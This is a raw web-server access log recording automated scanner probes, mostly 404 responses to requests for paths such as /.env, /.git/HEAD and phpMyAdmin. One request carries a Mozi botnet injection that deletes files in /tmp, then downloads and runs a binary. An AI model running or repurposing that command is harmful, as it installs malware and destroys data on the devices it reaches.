msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1488/1721] 183.136.225.14 () {32 vars in 495 bytes} [Wed Feb 16 22:23:54 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1489/1722] 23.251.102.90 () 
{34 vars in 487 bytes} [Wed Feb 16 22:33:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1490/1723] 106.14.45.145 () {22 vars in 234 bytes} [Wed Feb 16 22:43:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 105/1724] 106.14.45.145 () {22 vars in 295 bytes} [Wed Feb 16 22:43:22 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1491/1725] 106.14.45.145 () {22 vars in 238 bytes} [Wed Feb 16 22:43:30 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1492/1726] 106.14.45.145 () {22 vars in 237 bytes} [Wed Feb 16 22:43:34 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1493/1727] 106.14.45.145 () {40 vars in 483 bytes} [Wed Feb 16 22:43:39 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1494/1728] 39.99.229.34 () {32 vars in 408 bytes} [Wed Feb 16 22:51:46 2022] GET /text4041645051906 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1495/1729] 39.99.229.34 () {34 vars in 410 bytes} [Wed Feb 16 22:51:46 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1496/1730] 39.99.229.34 () {28 vars in 306 bytes} [Wed Feb 16 22:51:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 4/1731] 39.99.229.34 () {32 vars in 394 bytes} [Wed Feb 16 22:51:47 2022] GET /evox/about => generated 179 bytes in 2 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1497/1732] 39.99.229.34 () {32 vars in 384 bytes} [Wed Feb 16 22:51:47 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1498/1733] 39.99.229.34 () {36 vars in 462 bytes} [Wed Feb 16 22:51:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 5/1734] 39.99.229.34 () {34 vars in 413 bytes} [Wed Feb 16 22:51:58 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1499/1735] 209.17.96.202 () {30 vars in 410 bytes} [Wed Feb 16 23:09:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1500/1736] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 16 23:11:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1501/1737] 101.133.140.114 () {32 vars in 515 bytes} [Thu Feb 17 00:21:24 2022] GET /nmaplowercheck1645057284 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1502/1738] 101.133.140.114 () {32 vars in 487 bytes} [Thu Feb 17 00:21:24 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1503/1739] 101.133.140.114 () {34 vars in 503 bytes} [Thu Feb 17 00:21:36 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1504/1740] 101.133.140.114 () {32 vars in 477 bytes} [Thu Feb 17 00:21:37 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1505/1741] 
101.133.140.114 () {28 vars in 309 bytes} [Thu Feb 17 00:21:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1506/1742] 136.144.41.117 () {40 vars in 568 bytes} [Thu Feb 17 00:30:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1507/1743] 83.97.20.34 () {26 vars in 286 bytes} [Thu Feb 17 00:40:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1508/1744] 106.15.204.102 () {38 vars in 646 bytes} [Thu Feb 17 01:06:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 52/1745] 106.15.204.102 () {38 vars in 692 bytes} [Thu Feb 17 01:06:05 2022] GET /explicit_not_exist_path => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1509/1746] 106.15.204.102 () {38 vars in 658 bytes} [Thu Feb 17 01:06:05 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1510/1747] 106.15.204.102 () {38 vars in 695 bytes} [Thu Feb 17 01:06:05 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1511/1748] 106.15.204.102 () {40 vars in 755 bytes} [Thu Feb 17 01:06:06 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1512/1749] 106.15.204.102 () {40 vars in 757 bytes} [Thu Feb 17 01:06:06 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 21/1750] 106.15.204.102 () {40 vars in 787 bytes} [Thu Feb 17 01:06:06 2022] GET 
/login/img/product_logo.png => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 22/1751] 106.15.204.102 () {40 vars in 767 bytes} [Thu Feb 17 01:06:06 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1513/1752] 106.15.204.102 () {40 vars in 757 bytes} [Thu Feb 17 01:06:06 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1514/1753] 106.15.204.102 () {40 vars in 757 bytes} [Thu Feb 17 01:06:06 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1515/1754] 106.15.204.102 () {40 vars in 743 bytes} [Thu Feb 17 01:06:06 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1516/1755] 106.14.14.193 () {34 vars in 602 bytes} [Thu Feb 17 01:37:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1517/1756] 106.14.14.193 () {34 vars in 648 bytes} [Thu Feb 17 01:37:58 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1518/1757] 106.14.14.193 () {34 vars in 614 bytes} [Thu Feb 17 01:37:58 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1519/1758] 106.14.14.193 () {34 vars in 651 bytes} [Thu Feb 17 01:37:58 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1520/1759] 106.14.14.193 () {36 vars in 712 bytes} [Thu Feb 17 01:37:58 2022] GET /robots.txt => generated 179 bytes in 1 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1521/1760] 106.14.14.193 () {36 vars in 714 bytes} [Thu Feb 17 01:37:58 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1522/1761] 106.14.14.193 () {36 vars in 744 bytes} [Thu Feb 17 01:37:58 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1523/1762] 106.14.14.193 () {36 vars in 724 bytes} [Thu Feb 17 01:37:58 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1524/1763] 106.14.14.193 () {36 vars in 742 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1525/1764] 106.14.14.193 () {36 vars in 782 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1526/1765] 106.14.14.193 () {36 vars in 752 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1527/1766] 106.14.14.193 () {36 vars in 748 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1528/1767] 106.14.14.193 () {36 vars in 760 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1529/1768] 106.14.14.193 () {36 vars in 780 bytes} [Thu Feb 
17 01:37:58 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 106/1769] 106.14.14.193 () {36 vars in 744 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 107/1770] 106.14.14.193 () {36 vars in 748 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 108/1771] 106.14.14.193 () {36 vars in 714 bytes} [Thu Feb 17 01:37:58 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 109/1772] 106.14.14.193 () {36 vars in 714 bytes} [Thu Feb 17 01:37:59 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 110/1773] 106.14.14.193 () {36 vars in 700 bytes} [Thu Feb 17 01:37:59 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1530/1774] 192.241.214.26 () {34 vars in 394 bytes} [Thu Feb 17 01:50:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1531/1775] 8.142.23.67 () {38 vars in 677 bytes} [Thu Feb 17 02:06:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1532/1776] 121.89.200.181 () {38 vars in 680 bytes} [Thu Feb 17 02:10:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1533/1777] 121.89.200.181 () {30 vars in 357 bytes} [Thu Feb 17 02:10:21 2022] GET /sitemap.xml => 
generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1534/1778] 121.89.200.181 () {30 vars in 355 bytes} [Thu Feb 17 02:10:23 2022] GET /robots.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1535/1779] 39.103.146.195 () {38 vars in 680 bytes} [Thu Feb 17 02:19:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1536/1780] 39.103.146.195 () {30 vars in 355 bytes} [Thu Feb 17 02:19:49 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1537/1781] 39.103.146.195 () {30 vars in 357 bytes} [Thu Feb 17 02:19:49 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 111/1782] 39.103.146.195 () {24 vars in 261 bytes} [Thu Feb 17 02:21:58 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 53/1783] 39.103.146.195 () {34 vars in 638 bytes} [Thu Feb 17 02:21:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 26/1784] 39.103.146.195 () {26 vars in 315 bytes} [Thu Feb 17 02:22:12 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1538/1785] 39.103.237.48 () {38 vars in 679 bytes} [Thu Feb 17 02:24:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1539/1786] 107.189.13.6 () {32 vars in 370 bytes} [Thu Feb 17 02:55:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
1540/1787] 109.237.103.9 () {36 vars in 523 bytes} [Thu Feb 17 03:05:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1541/1788] 106.15.95.120 () {34 vars in 459 bytes} [Thu Feb 17 03:14:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1542/1789] 167.248.133.117 () {28 vars in 312 bytes} [Thu Feb 17 03:55:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1543/1790] 167.248.133.117 () {34 vars in 444 bytes} [Thu Feb 17 03:55:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1544/1791] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 17 04:14:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1545/1792] 37.120.142.10 () {34 vars in 552 bytes} [Thu Feb 17 04:17:58 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1546/1793] 37.120.142.10 () {34 vars in 559 bytes} [Thu Feb 17 04:17:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1547/1794] 37.120.142.10 () {38 vars in 666 bytes} [Thu Feb 17 04:18:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1548/1795] 198.46.233.60 () {48 vars in 876 bytes} [Thu Feb 17 05:45:30 2022] POST /boaform/admin/formLogin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1549/1796] 162.221.192.26 () {34 vars in 488 bytes} [Thu Feb 17 06:25:12 2022] GET / => generated 179 bytes in 1 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1550/1797] 134.122.59.51 () {36 vars in 481 bytes} [Thu Feb 17 06:57:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1551/1798] 183.136.225.56 () {34 vars in 535 bytes} [Thu Feb 17 07:55:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1552/1799] 91.219.55.20 () {30 vars in 435 bytes} [Thu Feb 17 08:05:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1553/1800] 188.214.106.182 () {36 vars in 564 bytes} [Thu Feb 17 08:15:12 2022] GET /.git/HEAD => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1554/1801] 200.110.172.74 () {32 vars in 464 bytes} [Thu Feb 17 08:30:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1555/1802] 49.143.32.6 () {34 vars in 639 bytes} [Thu Feb 17 09:37:27 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1556/1803] 200.53.20.96 () {32 vars in 463 bytes} [Thu Feb 17 09:38:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1557/1804] 172.105.189.111 () {34 vars in 489 bytes} [Thu Feb 17 09:55:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1558/1805] 20.151.201.9 () {36 vars in 499 bytes} [Thu Feb 17 10:32:34 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 
0) +[pid: 19148|app: 0|req: 1559/1806] 35.195.93.98 () {42 vars in 562 bytes} [Thu Feb 17 10:44:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1560/1807] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 17 10:47:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1561/1808] 81.39.100.157 () {34 vars in 393 bytes} [Thu Feb 17 10:54:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1562/1809] 216.218.206.69 () {28 vars in 308 bytes} [Thu Feb 17 11:22:50 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1563/1810] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 17 12:16:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1564/1811] 51.254.59.113 () {32 vars in 449 bytes} [Thu Feb 17 13:04:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1565/1812] 80.72.77.81 () {32 vars in 468 bytes} [Thu Feb 17 13:31:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1566/1813] 165.154.60.61 () {30 vars in 328 bytes} [Thu Feb 17 13:45:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1567/1814] 137.184.179.13 () {36 vars in 554 bytes} [Thu Feb 17 13:58:07 2022] GET /system_api.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1568/1815] 137.184.179.13 () {36 vars in 550 bytes} [Thu Feb 17 13:58:07 2022] GET /c/version.js => generated 179 bytes in 1 
msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1569/1816] 137.184.179.13 () {36 vars in 578 bytes} [Thu Feb 17 13:58:08 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1570/1817] 137.184.179.13 () {36 vars in 580 bytes} [Thu Feb 17 13:58:08 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1571/1818] 137.184.179.13 () {36 vars in 509 bytes} [Thu Feb 17 13:58:08 2022] GET /stream/live.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1572/1819] 137.184.179.13 () {36 vars in 550 bytes} [Thu Feb 17 13:58:08 2022] GET /flu/403.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1573/1820] 137.184.179.13 () {36 vars in 526 bytes} [Thu Feb 17 13:58:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1574/1821] 101.133.140.114 () {32 vars in 504 bytes} [Thu Feb 17 14:07:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1575/1822] 103.203.58.4 () {30 vars in 346 bytes} [Thu Feb 17 14:14:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1576/1823] 136.144.41.117 () {40 vars in 568 bytes} [Thu Feb 17 14:23:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1577/1824] 101.133.224.44 () {36 vars in 550 bytes} [Thu Feb 17 14:37:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 1578/1825] 142.147.99.155 () {36 vars in 524 bytes} [Thu Feb 17 14:37:38 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1579/1826] 142.147.99.155 () {40 vars in 631 bytes} [Thu Feb 17 14:37:39 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 54/1827] 106.14.126.174 () {34 vars in 604 bytes} [Thu Feb 17 14:39:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 55/1828] 106.14.126.174 () {34 vars in 650 bytes} [Thu Feb 17 14:39:32 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1580/1829] 106.14.126.174 () {34 vars in 616 bytes} [Thu Feb 17 14:39:33 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1581/1830] 106.14.126.174 () {34 vars in 653 bytes} [Thu Feb 17 14:39:33 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 6/1831] 106.14.126.174 () {36 vars in 713 bytes} [Thu Feb 17 14:39:33 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 112/1832] 106.14.126.174 () {36 vars in 715 bytes} [Thu Feb 17 14:39:33 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 113/1833] 106.14.126.174 () {36 vars in 745 bytes} [Thu Feb 17 14:39:33 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 114/1834] 106.14.126.174 () {36 vars in 
725 bytes} [Thu Feb 17 14:39:33 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 14/1835] 106.14.126.174 () {36 vars in 743 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 15/1836] 106.14.126.174 () {36 vars in 783 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 16/1837] 106.14.126.174 () {36 vars in 753 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 17/1838] 106.14.126.174 () {36 vars in 749 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1582/1839] 106.14.126.174 () {36 vars in 761 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 27/1840] 106.14.126.174 () {36 vars in 781 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 23/1841] 106.14.126.174 () {36 vars in 745 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/css/fonts.css => 